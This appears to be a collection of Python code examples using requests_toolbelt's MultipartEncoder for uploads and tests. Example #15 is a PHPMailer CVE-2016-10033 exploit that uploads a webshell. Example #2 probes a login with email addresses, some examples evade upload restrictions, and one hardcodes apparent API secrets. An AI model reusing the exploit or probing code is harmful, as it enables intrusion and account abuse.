Example #1
def upload_photo(self, photo, caption=None, upload_id=None):
    if upload_id is None:
        upload_id = str(int(time.time() * 1000))
    if not compatible_aspect_ratio(get_image_size(photo)):
        self.logger.info('Photo does not have a compatible '
                         'photo aspect ratio.')
        return False
    data = {
        'upload_id': upload_id,
        '_uuid': self.uuid,
        '_csrftoken': self.token,
        'image_compression': '{"lib_name":"jt","lib_version":"1.3.0","quality":"87"}',
        'photo': ('pending_media_%s.jpg' % upload_id, open(photo, 'rb'), 'application/octet-stream', {'Content-Transfer-Encoding': 'binary'})
    }
    m = MultipartEncoder(data, boundary=self.uuid)
    self.session.headers.update({'X-IG-Capabilities': '3Q4=',
                                 'X-IG-Connection-Type': 'WIFI',
                                 'Cookie2': '$Version=1',
                                 'Accept-Language': 'en-US',
                                 'Accept-Encoding': 'gzip, deflate',
                                 'Content-type': m.content_type,
                                 'Connection': 'close',
                                 'User-Agent': self.user_agent})
    response = self.session.post(
        config.API_URL + "upload/photo/", data=m.to_string())
    if response.status_code == 200:
        if self.configure_photo(upload_id, photo, caption):
            self.expose()
            return True
    return False
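
Note: the example above builds the entire body in memory with m.to_string(). A minimal sketch of the streaming alternative, assuming a hypothetical https://example.com/upload endpoint and a local photo.jpg:

import requests
from requests_toolbelt import MultipartEncoder

# Passing the encoder itself as `data` lets requests stream the body
# instead of materializing it first, which is what to_string() does.
m = MultipartEncoder(fields={
    'upload_id': '1234567890123',
    'photo': ('photo.jpg', open('photo.jpg', 'rb'), 'application/octet-stream'),
})
response = requests.post('https://example.com/upload',
                         data=m,
                         headers={'Content-Type': m.content_type})
print(response.status_code)
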
Example #2
def postold(csrfmiddle, cookie, mail):
	url = "https://ad.toutiao.com/old_login/"

	files = {
		"csrfmiddlewaretoken":(None, str(csrfmiddle)),
		"email":(None, str(mail)),
		"password":(None, "9090"),
	}


	from requests_toolbelt import MultipartEncoder
	
	m = MultipartEncoder(fields=files, boundary="----WebKitFormBoundaryRgFdemk5CNNZaY6j")

	headers = {
		'Accept':'*/*',
		'Accept-Encoding':'gzip, deflate, br',
		'Accept-Language':'en-US,en;q=0.8,zh;q=0.6',
		'Connection':'keep-alive',
		'Content-Type':m.content_type,
		'Host':'ad.toutiao.com',
		'Cookie':cookie,
		'Origin':'https://ad.toutiao.com',
		'Referer':'https://ad.toutiao.com/old_login/',
		'User-Agent':'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36',
		'X-Requested-With':'XMLHttpRequest',
	}

	r = ss.post(url, headers=headers, data=m.to_string(), verify=False)
	pp = json.loads(r.text)
	#print  pp
	if pp['code'] == 1009:
		print mail, "....", r.text
Example #3
    def save(self, cnxml):
        """Push new cnxml to RME"""
        data = MultipartEncoder(fields={'importFile': ('index.cnxml', cnxml.decode('utf-8')),
                                        'format': 'plain', 'submit': 'Import', 'form.submitted': '1',
                                        'came_from': 'module_text'})
        r = requests.post('%s/module_import_form' % self.url, data=data.to_string(),
                          auth=self.auth, headers={'Content-Type': data.content_type})
Example #4
    def _upload_artifact(self, local_artifact, path_prefix, repo_id, hostname_for_download=None, use_direct_put=False):

        filename = os.path.basename(local_artifact.local_path)
        logger.info('-> Uploading %s', filename)
        logger.debug('local artifact: %s', local_artifact)

        # rgavf stands for repo-group-local_artifact-version-filename
        gavf = '{group}/{name}/{ver}/{filename}'.format(group=local_artifact.group.replace('.', '/'),
                                                        name=local_artifact.artifact, ver=local_artifact.version,
                                                        filename=filename)
        rgavf = '{repo_id}/{gavf}'.format(repo_id=repo_id, gavf=gavf)

        with open(local_artifact.local_path, 'rb') as f:
            if not use_direct_put:
                data = {
                    'g':local_artifact.group,
                    'a':local_artifact.artifact,
                    'v':local_artifact.version,
                    'r':repo_id,
                    'e': local_artifact.extension,
                    'p': local_artifact.extension,
                    'hasPom': 'false'
                }


                data_list = list(data.items())  # list() so this also works on Python 3, where items() is a view
                data_list.append(('file', (filename, f, 'text/plain')))
                m_for_logging = MultipartEncoder(fields=data_list)
                logger.debug('payload: %s', m_for_logging.to_string())

                f.seek(0)
                m = MultipartEncoder(fields=data_list)
                headers = {'Content-Type': m.content_type}

                self._send('service/local/artifact/maven/content', method='POST', data=m, headers=headers)

                result = RemoteArtifact(group=local_artifact.group, artifact=local_artifact.artifact,
                                      version=local_artifact.version, classifier=local_artifact.classifier,
                                      extension=local_artifact.extension, repo_id=repo_id)
                self.resolve_artifact(result)
                return result

            else:
                headers = {'Content-Type': 'application/x-rpm'}
                remote_path = '{path_prefix}/{rgavf}'.format(path_prefix=path_prefix, rgavf=rgavf)
                self._send(remote_path, method='PUT', headers=headers, data=f)

                # if not specified, use repository url
                hostname_for_download = hostname_for_download or self._repository_url
                url = '{hostname}/content/repositories/{rgavf}'.format(hostname=hostname_for_download, rgavf=rgavf)

                # get classifier and extension from nexus
                path = 'service/local/repositories/{repo_id}/content/{gavf}?describe=maven2'.format(repo_id=repo_id, gavf=gavf)
                maven_metadata = self._send_json(path)['data']

                return RemoteArtifact(group=maven_metadata['groupId'], artifact=maven_metadata['artifactId'],
                                      version=maven_metadata['version'], classifier=maven_metadata.get('classifier', ''),
                                      extension=maven_metadata.get('extension', ''), url=url, repo_id=repo_id)
Example #5
    def test_encoding(self):
        """Test MultipartEncoder encoding"""
        with SubsetIO(self.fd, 1, 64) as fd:
            encoder = MultipartEncoder(
                fields={'file': (
                    "filename", fd, 'application/octet-stream'
                )}
            )

            data = encoder.read()
            self.assertTrue(len(data) > 0)
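
Note: SubsetIO above is a project-specific wrapper; MultipartEncoder only needs a file-like object with read(), so any such object can be used as a field value. A minimal sketch with an in-memory io.BytesIO buffer (field and file names here are made up):

import io
from requests_toolbelt import MultipartEncoder

buffer = io.BytesIO(b'sample_name\tbarcode\nSample 1\t000000001\n')  # stands in for a real file
encoder = MultipartEncoder(
    fields={'file': ('test_bc.txt', buffer, 'application/octet-stream')}
)
body = encoder.to_string()       # full multipart body, boundary included
assert len(body) > 0
print(encoder.content_type)      # multipart/form-data; boundary=...
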
Example #6
def test_multipart_encoder_interleave():
    pair = ("tests/data/files/test_R1_L001.fq.gz", "tests/data/files/test_R2_L001.fq.gz")
    fname, fsize, fformat = _file_stats(pair)
    wrapper = FASTXInterleave(pair, fsize, fformat)
    wrappertext = wrapper.read()
    wrapper.seek(0)

    assert len(wrappertext) == fsize

    multipart_fields = OrderedDict()
    multipart_fields["file"] = ("fakefile", wrapper, "text/plain")
    encoder = MultipartEncoder(multipart_fields)
    MAGIC_HEADER_LEN = 170  # shorter because of text/plain mime-type
    encodertext = encoder.read()
    assert len(encodertext) - MAGIC_HEADER_LEN == len(wrappertext)
Example #7
def test_multipart_encoder_passthru():
    wrapper = FilePassthru(
        "tests/data/files/test_R1_L001.fq.bz2",
        os.path.getsize("tests/data/files/test_R1_L001.fq.bz2"),
    )
    wrapper_len = len(wrapper.read())
    wrapper.seek(0)

    assert wrapper_len == wrapper._fsize

    multipart_fields = OrderedDict()
    multipart_fields["file"] = ("fakefile", wrapper, "application/x-gzip")
    encoder = MultipartEncoder(multipart_fields)
    MAGIC_HEADER_LEN = 178
    wrapper.seek(0)
    assert len(encoder.read()) - MAGIC_HEADER_LEN == wrapper_len
Example #8
    def test_post_file_error(self):
        file = StringIO('sample_name\tbarcode\nSample 1\t000000001\n')
        m = MultipartEncoder(
            fields={
                'sample-set': 'Sample Set 1',
                'type': 'test',
                'location': 'the freezer',
                'file': ('test_bc.txt', file, 'text/plain')}
        )

        self.assertEqual(len(pm.sample.Sample.search(sample_type='test')), 0)
        obs = self.post('/sample/add/', m.to_string(),
                        headers={'Content-Type': m.content_type})
        self.assertEqual(obs.code, 200)
        self.assertIn('The object with name \'Sample 1\' already exists in '
                      'table \'sample\'', obs.body.decode('utf-8'))
        self.assertEqual(len(pm.sample.Sample.search(sample_type='test')), 0)
Example #9
    def test_post_file(self):
        file = StringIO('sample_name\tother_col\ntest1\tval1\ntest2\tval2\n')
        m = MultipartEncoder(
            fields={
                'sample-set': 'Sample Set 1',
                'type': 'test',
                'location': 'the freezer',
                'file': ('test_bc.txt', file, 'text/plain')}
        )

        self.assertEqual(len(pm.sample.Sample.search(sample_type='test')), 0)
        obs = self.post('/sample/add/', m.to_string(),
                        headers={'Content-Type': m.content_type})
        self.assertEqual(obs.code, 200)
        self.assertIn('Created 2 samples from test_bc.txt',
                      obs.body.decode('utf-8'))
        self.assertEqual(len(pm.sample.Sample.search(sample_type='test')), 2)
Example #10
def facturar_rep(factura_id):
    logger.info('Task facturar iniciada')

    # Configure rounding
    getcontext().rounding = ROUND_HALF_UP

    # Get the current date
    fecha = timezone.localtime()

    # Look up the invoice
    factura = models.Factura.objects.get(id=factura_id)

    # Compute taxes

    # Load the CSD certificate
    cer = X509.load_cert(settings.CSD_CER, X509.FORMAT_DER)

    # Load the CSD private key
    key = RSA.load_key(settings.CSD_KEY)

    # Get the certificate serial number
    serial_number = '{:x}'.format(int(cer.get_serial_number())).decode('hex')

    # Get the folio
    folio_conf = models.Configuracion.objects.get(nombre='U_FOLIO')
    folio_conf.valor = folio_conf.valor + 1
    folio_conf.save()

    nsmap = {
        'cfdi': 'http://www.sat.gob.mx/cfd/3',
        'xsi': 'http://www.w3.org/2001/XMLSchema-instance',
        'pago10': 'http://www.sat.gob.mx/Pagos',
    }

    attrib = {
        '{http://www.w3.org/2001/XMLSchema-instance}schemaLocation':
        'http://www.sat.gob.mx/cfd/3 http://www.sat.gob.mx/sitio_internet/cfd/3/cfdv33.xsd http://www.sat.gob.mx/Pagos http://www.sat.gob.mx/sitio_internet/cfd/Pagos/Pagos10.xsd'
    }

    # cfdi:Comprobante node
    cfdi = etree.Element('{http://www.sat.gob.mx/cfd/3}Comprobante',
                         nsmap=nsmap,
                         attrib=attrib)

    cfdi.set('Version', '3.3')
    cfdi.set('Serie', settings.SERIE_REP)
    cfdi.set('Folio', str(folio_conf.valor))
    cfdi.set('Fecha', fecha.isoformat()[:19])
    cfdi.set('NoCertificado', serial_number)
    cfdi.set('Certificado', base64.b64encode(cer.as_der()))
    cfdi.set('SubTotal', '0')
    cfdi.set('Moneda', 'XXX')
    cfdi.set('Total', '0')
    cfdi.set('TipoDeComprobante', 'P')
    cfdi.set('LugarExpedicion', settings.CODIGO_POSTAL)

    # cfdi:Emisor node
    emisor = etree.SubElement(cfdi, '{http://www.sat.gob.mx/cfd/3}Emisor')
    emisor.set('Rfc', settings.RFC)
    emisor.set('Nombre', settings.RAZON_SOCIAL)
    emisor.set('RegimenFiscal', settings.REGIMEN_FISCAL)

    # cfdi:Receptor node
    receptor = etree.SubElement(cfdi, '{http://www.sat.gob.mx/cfd/3}Receptor')
    receptor.set('Rfc', factura.rfc_cliente)
    receptor.set('Nombre', factura.nombre_cliente)
    receptor.set('UsoCFDI', 'P01')

    # cfdi:Conceptos node
    conceptos = etree.SubElement(cfdi,
                                 '{http://www.sat.gob.mx/cfd/3}Conceptos')

    # cfdi:Concepto node
    concepto = etree.SubElement(conceptos,
                                '{http://www.sat.gob.mx/cfd/3}Concepto')
    concepto.set('ClaveProdServ', '84111506')
    concepto.set('Cantidad', '1')
    concepto.set('ClaveUnidad', 'ACT')
    concepto.set('Descripcion', 'Pago')
    concepto.set('ValorUnitario', '0.000000')
    concepto.set('Importe', '0.00')

    # cfdi:Complemento node
    complemento = etree.SubElement(cfdi,
                                   '{http://www.sat.gob.mx/cfd/3}Complemento')

    # pago10:Pagos node
    pagos = etree.SubElement(complemento, '{http://www.sat.gob.mx/Pagos}Pagos')
    pagos.set('Version', '1.0')

    # pago10:Pago node
    pago = etree.SubElement(pagos, '{http://www.sat.gob.mx/Pagos}Pago')
    pago.set('FechaPago', '{}T01:00:00'.format(factura.fecha_pago.isoformat()))
    pago.set('FormaDePagoP', factura.forma_pago_rep)
    pago.set('MonedaP', settings.MONEDA)
    pago.set('Monto', '{}'.format(factura.total))
    pago.set('NumOperacion', factura.num_operacion)

    # pago10:DoctoRelacionado node
    docto_relacionado = etree.SubElement(
        pago, '{http://www.sat.gob.mx/Pagos}DoctoRelacionado')
    docto_relacionado.set('IdDocumento', '{}'.format(factura.uuid))
    docto_relacionado.set('Serie', factura.serie)
    docto_relacionado.set('Folio', '{}'.format(factura.folio))
    docto_relacionado.set('MonedaDR', settings.MONEDA)
    docto_relacionado.set('MetodoDePagoDR', factura.contrato.metodo_pago)
    docto_relacionado.set('NumParcialidad', '1')
    docto_relacionado.set('ImpSaldoAnt', '{}'.format(factura.total))
    docto_relacionado.set('ImpPagado', '{}'.format(factura.total))
    docto_relacionado.set('ImpSaldoInsoluto', '0')

    # Load the XSLT used to build the original string (cadena original)
    xslt = etree.XSLT(etree.parse(settings.PATH_XLST))

    # Generate the original string
    cadena_original = xslt(cfdi)

    # Hash the original string
    digest = hashlib.new('sha256', str(cadena_original)).digest()

    # Sign the digest of the original string
    sign = key.sign(digest, "sha256")

    # Encode the signature (sello) from bytes to base64
    sello = base64.b64encode(sign)

    # Add the sello to the XML document
    cfdi.set('Sello', sello)

    # Serialize the XML document
    xml = etree.tostring(cfdi, pretty_print=True)

    # Format token
    token = 'bearer %s' % str(settings.PAC_TOKEN)

    # Build the multipart message that attaches the file
    m = MultipartEncoder(fields={
        'xml': ('xml', xml, 'text/xml', {
            'Content-Transfer-Encoding': 'binary'
        })
    })

    # Build the headers
    headers = {'Content-Type': m.content_type, 'Authorization': token}

    # POST the request to the PAC
    req = requests.post(settings.PAC_URL, headers=headers, data=m.to_string())

    # Check the response
    if req.status_code != 200:
        raise Exception(u'id_factura: {} Error {}'.format(
            factura.id, req.json()))

    # Extract the XML
    xml_timbrado = req.json()['data']['cfdi'].encode('utf-8')

    # Parse the stamped XML
    cfdi_timbrado = etree.fromstring(xml_timbrado)

    # Find the UUID
    uuid = cfdi_timbrado.find('{http://www.sat.gob.mx/cfd/3}Complemento').find(
        '{http://www.sat.gob.mx/TimbreFiscalDigital}TimbreFiscalDigital'
    ).attrib.get('UUID')

    # Generate the PDF
    xml_dict = xmltodict.parse(xml_timbrado)['cfdi:Comprobante']

    cbb_url = 'https://verificacfdi.facturaelectronica.sat.gob.mx/' \
              'default.aspx?id={0}re={1}&rr={2}&tt={3}&fe={4}'.format(
        uuid,
        settings.RFC,
        factura.rfc_cliente,
        factura.total,
        sello[(len(sello) - 8):],
    )

    # Generate the CBB QR code
    qrdata = qrcode.make(cbb_url)
    raw = StringIO()
    qrdata.save(raw)
    cbb = b64encode(raw.getvalue())

    # Render the HTML
    html = get_template('webapp/factura-pago-pdf.html').render({
        'xml':
        xml_dict,
        'cadena_original':
        cadena_original,
        'cbb':
        cbb,
    })

    # Generate the PDF
    pdf = pdfkit.from_string(html,
                             False,
                             options={
                                 'page-size': 'Letter',
                                 'encoding': "UTF-8",
                                 'quiet': '',
                             })

    # Save the invoice to the database
    factura.uuid_rep = uuid
    factura.xml_rep = ContentFile(xml_timbrado, name='{0}.xml'.format(uuid))
    factura.pdf_rep = ContentFile(pdf, name='{0}.pdf'.format(uuid))
    factura.save()

    # Send the email
    html_email = get_template('webapp/factura-correo.txt').render(
        {'factura': factura})

    msg = EmailMessage('{} Nuevo REP {} {} Generada'.format(
        settings.RAZON_SOCIAL, factura.serie, factura.folio),
                       html_email,
                       settings.DEFAULT_FROM_EMAIL,
                       to=[factura.correo_cliente],
                       reply_to=[settings.TENANT_EMAIL],
                       cc=[settings.TENANT_EMAIL])
    msg.attach('{}_{}.xml'.format(factura.serie, factura.folio),
               factura.xml.read(), 'application/xml')
    msg.attach('{}_{}.pdf'.format(factura.serie, factura.folio),
               factura.pdf.read(), 'application/pdf')

    msg.attach('{}_{}.xml'.format(factura.serie, factura.folio),
               factura.xml_rep.read(), 'application/xml')
    msg.attach('{}_{}.pdf'.format(factura.serie, factura.folio),
               factura.pdf_rep.read(), 'application/pdf')
    msg.send()

    logger.info('Task facturar terminada')

    return factura.id
Example #11
    def _upload_a_file(self, file_path, folder_id=-1, call_back=None):
        """Upload a file to the given Lanzou Cloud folder (root directory by default)"""
        if not os.path.exists(file_path):
            return LanZouCloud.FAILED
        file_name = re.sub(
            r'\s', '_',
            os.path.basename(file_path))  # take the file name from the path and replace whitespace (Linux file name restriction)
        tmp_list = {
            **self.get_file_list2(folder_id),
            **self.get_dir_list(folder_id)
        }
        if file_name in tmp_list.keys():
            self.delete(tmp_list[file_name])  # delete the file if it already exists

        suffix = file_name.split(".")[-1]
        valid_suffix_list = [
            'doc', 'docx', 'zip', 'rar', 'apk', 'ipa', 'txt', 'exe', '7z', 'e',
            'z', 'ct', 'ke', 'cetrainer', 'db', 'tar', 'pdf', 'w3x', 'epub',
            'mobi', 'azw', 'azw3', 'osk', 'osz', 'xpa', 'cpk', 'lua', 'jar',
            'dmg', 'ppt', 'pptx', 'xls', 'xlsx', 'mp3', 'iso', 'img', 'gho',
            'ttf', 'ttc', 'txf', 'dwg', 'bat', 'dll'
        ]
        # unsupported formats are smuggled through by changing the suffix
        if suffix not in valid_suffix_list:
            file_name = file_name + self._guise_suffix

        # The split-archive suffix .part[0-9]+.rar is blocked by Lanzou Cloud, so the naming rule is changed:
        # renaming .part[0-9]+.rar to .xxx[0-9]+.rar still extracts correctly, which bypasses the check
        if suffix == 'rar' and 'part' in file_name.split(".")[-2]:
            file_name = file_name.replace('.part', f'.{self._rar_part_name}')
        logger.debug(
            f'Upload file {file_path} to folder ID#{folder_id} as "{file_name}"'
        )

        post_data = {
            "task":
            "1",
            "folder_id":
            str(folder_id),
            "id":
            "WU_FILE_0",
            "name":
            file_name,
            "upload_file": (file_name, open(file_path,
                                            'rb'), 'application/octet-stream')
        }

        post_data = MultipartEncoder(post_data)
        tmp_header = self._headers.copy()
        tmp_header['Content-Type'] = post_data.content_type
        # keep the disguise suffix out of the callback's file name
        if file_name.endswith(self._guise_suffix):
            file_name = file_name.replace(self._guise_suffix, '')
        # MultipartEncoderMonitor fires the callback once for every 8129 bytes uploaded; the root cause is the httplib library
        # issue : https://github.com/requests/toolbelt/issues/75
        # After the upload finishes, the callback is wrongly invoked one extra time, so it is re-wrapped below
        # with different arguments and the redundant call is blocked
        self._upload_finished_flag = False  # flag marking the upload as finished

        def _call_back(read_monitor):
            if call_back is not None:
                if not self._upload_finished_flag:
                    call_back(file_name, read_monitor.len,
                              read_monitor.bytes_read)
                if read_monitor.len == read_monitor.bytes_read:
                    self._upload_finished_flag = True

        try:
            monitor = MultipartEncoderMonitor(post_data, _call_back)
            result = self._session.post('http://pc.woozooo.com/fileup.php',
                                        data=monitor,
                                        headers=tmp_header).json()
            if result["zt"] == 0: return LanZouCloud.FAILED  # upload failed
            file_id = result["text"][0]["id"]
            # Lanzou Cloud blocks uploading 100 MB files back to back, so after a 100 MB file a "fake file" is uploaded to get around it
            # check whether the uploaded file is such a "fake file"; if so, delete it right after the upload
            if result['text'][0]['name_all'].startswith(
                    self._fake_file_prefix):
                self.delete(file_id)
            else:
                self.set_share_passwd(file_id)  # normal files have the share password disabled by default after upload
            return LanZouCloud.SUCCESS
        except (requests.RequestException, KeyboardInterrupt):
            return LanZouCloud.FAILED
Example #12
import requests
from requests_toolbelt import MultipartEncoder

if __name__ == '__main__':
    content_dict = {}
    content_dict['image'] = ("big_image.png",
                             open("/workdir/src/big_image.jpg",
                                  'rb'), 'image/*')
    content_dict['mode'] = (
        "mode", open('/workdir/src/sliding_window_mode_example.json', 'rb'))

    encoder = MultipartEncoder(fields=content_dict)
    response = requests.post("http://0.0.0.0:5000/model/inference",
                             data=encoder,
                             headers={'Content-Type': encoder.content_type})
    print(response.json())
Example #13
    def _upload_a_file(self, file_path, folder_id=-1, call_back=None) -> int:
        """Upload a file to the given Lanzou Cloud folder (root directory by default)"""
        if not os.path.isfile(file_path):
            return LanZouCloud.PATH_ERROR
        file_name = os.path.basename(file_path)  # take the file name from the path
        try:
            tmp_list = {**self.get_file_id_list(folder_id), **self.get_dir_id_list(folder_id)}
            if file_name in tmp_list.keys():
                self.delete(tmp_list[file_name])  # delete the file if it already exists
        except TimeoutError:
            return LanZouCloud.NETWORK_ERROR

        suffix = file_name.split(".")[-1]
        valid_suffix_list = ['doc', 'docx', 'zip', 'rar', 'apk', 'ipa', 'txt', 'exe', '7z', 'e', 'z', 'ct',
                             'ke', 'cetrainer', 'db', 'tar', 'pdf', 'w3x', 'epub', 'mobi', 'azw', 'azw3',
                             'osk', 'osz', 'xpa', 'cpk', 'lua', 'jar', 'dmg', 'ppt', 'pptx', 'xls', 'xlsx',
                             'mp3', 'iso', 'img', 'gho', 'ttf', 'ttc', 'txf', 'dwg', 'bat', 'dll']
        # unsupported formats are smuggled through by changing the suffix
        if suffix not in valid_suffix_list:
            file_name = file_name.replace('.', '#')  # the service rejects multiple suffixes in the file name, so use "#" instead of "."
            file_name = file_name + self._guise_suffix

        # The split-archive suffix .part[0-9]+.rar is blocked by Lanzou Cloud, so the naming rule is changed:
        # renaming .part[0-9]+.rar to .xxx[0-9]+.rar still extracts correctly, which bypasses the check
        if suffix == 'rar' and 'part' in file_name.split(".")[-2]:
            file_name = file_name.replace('.part', f'.{self._rar_part_name}')
        logger.debug(f'Upload file {file_path} to folder ID#{folder_id} as "{file_name}"')
        with open(file_path, 'rb') as _file_handle:
            post_data = {
                "task": "1",
                "folder_id": str(folder_id),
                "id": "WU_FILE_0",
                "name": file_name,
                "upload_file": (file_name, _file_handle, 'application/octet-stream')
            }
            post_data = MultipartEncoder(post_data)
            tmp_header = self._headers.copy()
            tmp_header['Content-Type'] = post_data.content_type
            # keep the disguise suffix out of the callback's file name
            file_name, _ = self._get_right_name(file_name)

            # MultipartEncoderMonitor fires the callback once for every 8129 bytes uploaded; the root cause is the httplib library
            # issue : https://github.com/requests/toolbelt/issues/75
            # After the upload finishes, the callback is wrongly invoked one extra time, so it is re-wrapped below
            # with different arguments and the redundant call is blocked
            self._upload_finished_flag = False  # flag marking the upload as finished

            def _call_back(read_monitor):
                if call_back is not None:
                    if not self._upload_finished_flag:
                        call_back(file_name, read_monitor.len, read_monitor.bytes_read)
                    if read_monitor.len == read_monitor.bytes_read:
                        self._upload_finished_flag = True

            monitor = MultipartEncoderMonitor(post_data, _call_back)
            result = self._POST('https://pc.woozooo.com/fileup.php', data=monitor, headers=tmp_header)
            if not result:  # network error
                return LanZouCloud.NETWORK_ERROR
            else:
                result = result.json()
            if result["zt"] != 1:
                logger.warning(f'Upload failed: {result}')
                return LanZouCloud.FAILED  # upload failed

            # Lanzou Cloud blocks uploading 100 MB files back to back, so after a 100 MB file a "fake file" is uploaded to get around it
            # check whether the uploaded file is such a "fake file"; if so, delete it right after the upload
            file_id = result["text"][0]["id"]
            if result['text'][0]['name_all'].startswith(self._fake_file_prefix):
                self.delete(file_id)
                self.delete_rec(file_id)
            else:
                self.set_passwd(file_id)  # the share password is disabled by default after upload
            return LanZouCloud.SUCCESS
Example #14
def _upload_source(ctx,
                   username,
                   id,
                   features,
                   no_validation,
                   quiet,
                   replace,
                   token=None,
                   indent=None):
    """Create/add a tileset source

    tilesets add-source <username> <id> <path/to/source/data>
    """
    mapbox_api = utils._get_api()
    mapbox_token = utils._get_token(token)
    s = utils._get_session()
    url = (
        f"{mapbox_api}/tilesets/v1/sources/{username}/{id}?access_token={mapbox_token}"
    )

    method = "post"
    if replace:
        method = "put"

    # This does the decoding by hand instead of using pyjwt because
    # pyjwt rejects tokens that don't pad the base64 with = signs.
    token_parts = mapbox_token.split(".")
    if len(token_parts) < 2:
        raise errors.TilesetsError(
            f"Token {mapbox_token} does not contain a payload component")
    else:
        while len(token_parts[1]) % 4 != 0:
            token_parts[1] = token_parts[1] + "="
        body = json.loads(base64.b64decode(token_parts[1]))
        if "u" in body:
            if username != body["u"]:
                raise errors.TilesetsError(
                    f"Token username {body['u']} does not match username {username}"
                )
        else:
            raise errors.TilesetsError(
                f"Token {mapbox_token} does not contain a username")

    with tempfile.TemporaryFile() as file:
        for feature in features:
            if not no_validation:
                utils.validate_geojson(feature)

            file.write((json.dumps(feature, separators=(",", ":")) +
                        "\n").encode("utf-8"))

        file.seek(0)
        m = MultipartEncoder(fields={"file": ("file", file)})

        if quiet:
            resp = getattr(s, method)(
                url,
                data=m,
                headers={
                    "Content-Disposition": "multipart/form-data",
                    "Content-type": m.content_type,
                },
            )
        else:
            prog = click.progressbar(length=m.len,
                                     fill_char="=",
                                     width=0,
                                     label="upload progress")
            with prog:

                def callback(m):
                    prog.pos = m.bytes_read
                    prog.update(0)  # Step is 0 because we set pos above

                monitor = MultipartEncoderMonitor(m, callback)
                resp = getattr(s, method)(
                    url,
                    data=monitor,
                    headers={
                        "Content-Disposition": "multipart/form-data",
                        "Content-type": monitor.content_type,
                    },
                )

    if resp.status_code == 200:
        click.echo(json.dumps(resp.json(), indent=indent))
    else:
        raise errors.TilesetsError(resp.text)
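
Note: the upload above wires MultipartEncoderMonitor into a click progress bar. A stripped-down sketch of the same progress pattern with a plain callback, assuming a hypothetical https://example.com/upload endpoint and a local data.bin file:

import requests
from requests_toolbelt import MultipartEncoder, MultipartEncoderMonitor

encoder = MultipartEncoder(fields={'file': ('data.bin', open('data.bin', 'rb'))})

def report_progress(monitor):
    # monitor.bytes_read grows as requests reads the encoded body
    percent = monitor.bytes_read / encoder.len * 100
    print('upload progress: {:.1f}%'.format(percent), end='\r')

monitor = MultipartEncoderMonitor(encoder, report_progress)
resp = requests.post('https://example.com/upload',
                     data=monitor,
                     headers={'Content-Type': monitor.content_type})
print()
print(resp.status_code)
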
Example #15
print("██╔══██║██║╚██╗██║██╔══██║██╔══██╗██║     ██║   ██║██║  ██║██╔══╝  ██╔══██╗")
print("██║  ██║██║ ╚████║██║  ██║██║  ██║╚██████╗╚██████╔╝██████╔╝███████╗██║  ██║")
print("╚═╝  ╚═╝╚═╝  ╚═══╝╚═╝  ╚═╝╚═╝  ╚═╝ ╚═════╝ ╚═════╝ ╚═════╝ ╚══════╝╚═╝  ╚═╝")
print("      PHPMailer Exploit CVE 2016-10033 - anarcoder at protonmail.com")
print(" Version 1.0 - github.com/anarcoder - greetings opsxcq & David Golunski\n")

target = 'http://*****:*****@protonmail.com',
        'message': 'Pwned'}

m = MultipartEncoder(fields=fields,
                     boundary='----WebKitFormBoundaryzXJpHSq4mNy35tHe')

headers={'User-Agent': 'curl/7.47.0',
         'Content-Type': m.content_type}

proxies = {'http': 'localhost:8081', 'https':'localhost:8081'}


print('[+] SeNdiNG eVIl SHeLL To TaRGeT....')
r = requests.post(target, data=m.to_string(),
                  headers=headers)
print('[+] SPaWNiNG eVIL sHeLL..... bOOOOM :D')
r = requests.get(target+backdoor, headers=headers)
if r.status_code == 200:
    print('[+]  ExPLoITeD ' + target)
Example #16
from requests_toolbelt import MultipartEncoder
import requests
import os, sys


dir="/Users/wywy/Desktop/text_image/"
dir1="/Users/wywy/Desktop/json/"
b=0
for ii in os.listdir(dir):
    b+=1
    m = MultipartEncoder(
        fields={
            'APPID':'1256752352',
            'api_key': '84mHZfjcIl26yd6LNDpEQPBl7GEyUnuo',
            'api_secret': 'AKIDazBByYh63nKgplG1LSL1TmskQs8BEe4H',
            # 'image_file': ('filename', open('./timg.jpg', 'rb'), 'image/png')
            'image_file': ('filename', open(str(dir+str(ii)), 'rb'), 'image/png')
        })

    r = requests.post('http://recognition.image.myqcloud.com/ocr/handwriting', data=m,
                      headers={'Content-Type': m.content_type})

    d=r.content
    # print(r.content,'11')
    # print(type(r),'22')
    # print(type(r.json()),'33')
    # print(r.json(),'44')
    a=r.json()
# create an empty file
    arr=ii.split(".")
    text=str(arr[0]+".json")
Example #17
    def _upload_video(self, video_file, callback, session, proxy):

        upload_path = self._get_path_to_upload()
        go_to_upload = session.get(upload_path, proxies=proxy)

        upload_form_url = self._get_path_to_users_upload()

        session.headers.update({'X-Requested-With': 'XMLHttpRequest'})
        get_upload_form = session.get(upload_form_url,
                                      proxies=proxy,
                                      verify=False)

        regex_api_key = r'var\s+kumm_api_key\s+=\s+"(.*?)"'
        regex_user_id = r'var\s+user_id\s+=\s+"(.*?)"'
        regex_callback_url = r'var\s+callback_url\s+=\s+"(.*?)"'

        found_api_key = re.search(regex_api_key, get_upload_form.content)
        found_user_id = re.search(regex_user_id, get_upload_form.content)
        found_callback_url = re.search(regex_callback_url,
                                       get_upload_form.content)

        if not found_api_key:
            raise KummProblem('Could not find api_key')
        if not found_user_id:
            raise KummProblem('Could not find user_id')
        if not found_callback_url:
            raise KummProblem('Could not find callback_url')

        api_key = found_api_key.group(1)
        user_id = found_user_id.group(1)
        callback_url = found_callback_url.group(1)

        doc = etree.fromstring(get_upload_form.content, HTMLParser())
        get_upload_url = doc.xpath('//input[@id="fileupload"]/@data-url')

        if len(get_upload_url) == 0:
            raise KummProblem(
                'Could not find kumm posting url for the video upload')

        posting_url = get_upload_url[0]
        session.options(posting_url, proxies=proxy, verify=False)

        fields = []
        fields.append(('token', api_key))
        fields.append(('callBackUrl', callback_url))
        fields.append(('website', self.website))
        fields.append(('userId', user_id))
        fields.append(
            ('files[]', (path.Path(video_file).name, open(video_file, 'rb'))))

        encoder = MultipartEncoder(fields)
        if callback:
            monitor = MultipartEncoderMonitor(encoder, callback)
        else:
            monitor = MultipartEncoderMonitor(encoder)

        submit_upload = session.post(
            posting_url,
            data=monitor,
            headers={'Content-Type': monitor.content_type},
            proxies=proxy,
            verify=False)
        try:
            response = submit_upload.json()
        except:
            raise KummProblem(
                'Expecting json, did not receive json after video uploading')
        else:
            if 'err' in response:
                raise KummProblem(
                    'Kumm uploader experienced an error after uploading:{err}'.
                    format(err=response['err']))
            elif 'uuid' in response:
                return response['uuid']
Example #18
    def serve_model(
        self,
        model,
        model_id: str = None,
        mpc: bool = False,
        allow_download: bool = False,
        allow_remote_inference: bool = False,
